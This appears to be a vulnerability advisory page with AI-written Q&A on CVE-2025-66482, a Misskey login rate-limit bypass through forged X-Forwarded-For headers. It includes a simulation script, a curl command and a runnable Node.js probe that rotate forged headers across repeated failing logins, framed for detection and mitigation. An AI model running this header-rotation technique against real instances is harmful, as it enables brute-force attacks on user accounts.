CVE-2025-66482
IP Rate Limiting Bypass in Misskey via Forged X-Forwarded-For Header
Publication date: 2025-12-16
Last updated on: 2025-12-16
Assigner: GitHub, Inc.
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| misskey | misskey | 2025.9.1 |
| misskey | misskey | 2025.12.0-alpha.2 |
| misskey | misskey | 13.0.0-beta.16 |
| misskey | misskey | 2025.12.0 |
| misskey | misskey | 2025.11.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-1188 | The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure. |
| CWE-307 | The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-66482 is a vulnerability in Misskey, a decentralized social networking platform, where an attacker can bypass the IP-based login rate limit by forging the X-Forwarded-For HTTP header. The login rate limiter is keyed on the client IP address, and when the `trustProxy` setting is enabled Misskey takes that address from X-Forwarded-For instead of from the TCP connection. If the instance is reachable directly, or sits behind a proxy that does not overwrite the header, the attacker controls the header value and can present a fresh "client IP" on every request, so each login attempt lands in a new rate-limit bucket, the limiter never trips, and a brute-force login attack becomes possible. Before version 2025.12.0-alpha.2 the default configuration was insecure because `trustProxy` was enabled by default; the fix changes the default to false, so proxy headers are ignored unless an administrator explicitly configures otherwise. [1]
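The mechanism described above, as an added illustration that is not Misskey's code: a limiter keyed on the resolved client IP, fed by an attacker on a single TCP address who rotates a forged X-Forwarded-For. The request shape, the `resolveClientIp` helper and the "trust proxy" semantics are simplified assumptions modelled on the usual Node.js behaviour, and the addresses are constructed from documentation ranges.

```javascript
// Added illustration (not Misskey code): why a rate limiter keyed on the
// client IP collapses when X-Forwarded-For is trusted unconditionally.
// Request shape and trust-proxy semantics are simplified assumptions.

// Resolve the IP a limiter should key on. With trustProxy=true the left-most
// X-Forwarded-For entry wins, i.e. whatever the sender chose to put there.
function resolveClientIp(req, trustProxy) {
  const xff = req.headers['x-forwarded-for'];
  if (trustProxy && xff) {
    return xff.split(',')[0].trim();
  }
  return req.socketAddress;
}

// Hardened variant: honour X-Forwarded-For only when the TCP peer is an
// allow-listed reverse proxy; otherwise fall back to the socket address.
function resolveClientIpTrusted(req, trustedProxies) {
  return trustedProxies.has(req.socketAddress)
    ? resolveClientIp(req, true)
    : req.socketAddress;
}

// Minimal fixed-window limiter: at most `limit` hits per key.
class RateLimiter {
  constructor(limit) {
    this.limit = limit;
    this.hits = new Map();
  }
  allow(key) {
    const n = (this.hits.get(key) || 0) + 1;
    this.hits.set(key, n);
    return n <= this.limit;
  }
}

// One attacker on one TCP address hammers the login endpoint while rotating a
// forged X-Forwarded-For. Returns how many attempts the limiter let through.
function simulateBruteForce(resolveIp, { attempts, limit }) {
  const limiter = new RateLimiter(limit);
  let passed = 0;
  for (let i = 0; i < attempts; i++) {
    const req = {
      socketAddress: '203.0.113.10', // attacker's real address (constructed, TEST-NET-3)
      headers: { 'x-forwarded-for': `198.51.100.${(i % 254) + 1}` }, // forged, rotates per request
    };
    if (limiter.allow(resolveIp(req))) passed++;
  }
  return passed;
}

const scenario = { attempts: 100, limit: 5 };
const proxies = new Set(['10.0.0.2']); // the only legitimate reverse proxy (constructed)

console.log('trustProxy=true :', simulateBruteForce((r) => resolveClientIp(r, true), scenario)); // 100
console.log('trustProxy=false:', simulateBruteForce((r) => resolveClientIp(r, false), scenario)); // 5
console.log('allow-listed    :', simulateBruteForce((r) => resolveClientIpTrusted(r, proxies), scenario)); // 5
```

With header trust on, all 100 attempts pass because every request is a new key; with it off, or with trust restricted to an allow-listed proxy, the limiter stops the attacker after 5. The allow-list variant also shows the only safe way to keep header trust: the proxy itself must be the TCP peer, and it must overwrite the header rather than append to a client-supplied one.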
How can this vulnerability impact me?
An attacker who can spoof X-Forwarded-For can keep attempting logins without ever being throttled, which turns the login endpoint into a brute-force target and can end in unauthorized access to user accounts and misuse of the compromised accounts. The advisory rates the integrity and availability impact as low and the confidentiality impact as none, for a moderate severity overall. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Start with the configuration: look for the trustProxy setting in your Misskey configuration file. On versions before 2025.12.0-alpha.2 the setting defaulted to enabled, so an absent key means the header is trusted; such an instance is vulnerable unless trustProxy is explicitly set to false or the instance is reachable only through a trusted reverse proxy that overwrites X-Forwarded-For with the real peer address. Then confirm the behaviour empirically, on an instance you are authorised to test: send repeated failing login requests to the /api/signin-flow endpoint, each with a different forged header value, and watch whether the limiter ever answers. A single request looks like: curl -X POST https://your-misskey-instance/api/signin-flow -H "Content-Type: application/json" -H "X-Forwarded-For: 1.2.3.4" -d '{"some":"data"}' (with a failing login payload in the body). Repeat it past the per-IP limit while changing the X-Forwarded-For value. A lone request proves nothing; compare against a run without the header. If the header-less run is throttled while the forged run is not, the header is being used as the rate-limit key and the bypass is present. [1]
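The check described above as a runnable probe. This is an added example, not Misskey project code, and it rests on assumptions: Node 18+ (global fetch); the endpoint is POST /api/signin-flow as the advisory names it; the JSON body fields are placeholders for a login that must fail; a throttled request is answered with HTTP 429. It deliberately trips the limiter, so run it only against an instance you are authorised to test.

```javascript
// Added detection probe (not Misskey code). Assumptions: Node 18+ global fetch,
// POST /api/signin-flow, placeholder body fields for a failing login, 429 on throttle.

const ATTEMPTS = 30; // must exceed the instance's per-IP login limit to be meaningful

// Forged header value for attempt i, rotating through a documentation range.
function forgedXff(i) {
  return `198.51.100.${(i % 254) + 1}`;
}

// Fire `attempts` failing logins; with forge=true each carries a distinct
// X-Forwarded-For. Returns the list of HTTP status codes observed.
async function hammer(baseUrl, { attempts = ATTEMPTS, forge = false } = {}) {
  const statuses = [];
  for (let i = 0; i < attempts; i++) {
    const headers = { 'Content-Type': 'application/json' };
    if (forge) headers['X-Forwarded-For'] = forgedXff(i);
    const res = await fetch(`${baseUrl}/api/signin-flow`, {
      method: 'POST',
      headers,
      // Placeholder credentials (assumed field names); the login must fail.
      body: JSON.stringify({ username: 'xff-probe-nonexistent', password: 'wrong-password' }),
    });
    statuses.push(res.status);
  }
  return statuses;
}

// Compare a baseline run (no forged header) with the forged run. The baseline
// proves the limiter exists at all; only then does "no 429 while forging" mean
// the forged header is being used as the rate-limit key.
function classifyProbe(baselineStatuses, forgedStatuses) {
  const count429 = (xs) => xs.filter((s) => s === 429).length;
  const baseline = count429(baselineStatuses);
  const forged = count429(forgedStatuses);
  let verdict;
  if (baseline === 0) verdict = 'inconclusive';   // never throttled: raise ATTEMPTS or check the configured limit
  else if (forged === 0) verdict = 'bypass';      // limiter went silent once the header rotated
  else verdict = 'not-bypassed';
  return { baseline429: baseline, forged429: forged, verdict };
}

async function probe(baseUrl) {
  // Baseline first: it exhausts the quota for the real peer address, so on a
  // correctly configured instance the forged run is throttled from the start.
  const baseline = await hammer(baseUrl, { forge: false });
  const forged = await hammer(baseUrl, { forge: true });
  return classifyProbe(baseline, forged);
}

// Usage: node xff-probe.js https://your-misskey-instance
if (process.argv[2]) {
  probe(process.argv[2]).then((r) => console.log(r)).catch((e) => console.error(e.message));
}
```

A 'bypass' verdict means rate limiting is keyed on an attacker-controlled header. 'not-bypassed' is what you expect with trustProxy: false, or with trustProxy enabled behind a proxy that overwrites the header. 'inconclusive' means the limiter never fired even without forgery, so either the configured limit is above ATTEMPTS or rate limiting is not active at all, which is worth investigating on its own.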
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps: 1) On affected versions (2025.9.1 through 2025.11.1 in the affected-products table), set 'trustProxy: false' in the configuration file so that X-Forwarded-For is ignored and the TCP peer address is used for rate limiting. Note that if a reverse proxy sits in front of the instance, every client will then appear to come from the proxy's address and share one rate-limit bucket, so this setting is only appropriate for an instance that is exposed directly. 2) Otherwise keep the instance behind a trusted reverse proxy, make sure the application port is not reachable except through that proxy, and configure the proxy to overwrite X-Forwarded-For with the connecting peer's address rather than appending to a client-supplied value; only then can the header be trusted. 3) Upgrade to 2025.12.0 or later (the default changed in 2025.12.0-alpha.2), where 'trustProxy' is false unless explicitly configured, which fully patches the insecure default. 4) After upgrading or editing the configuration, re-check the effective 'trustProxy' value: an explicit 'trustProxy: true' carried over from an older configuration reinstates header trust even on a patched version. [1, 2]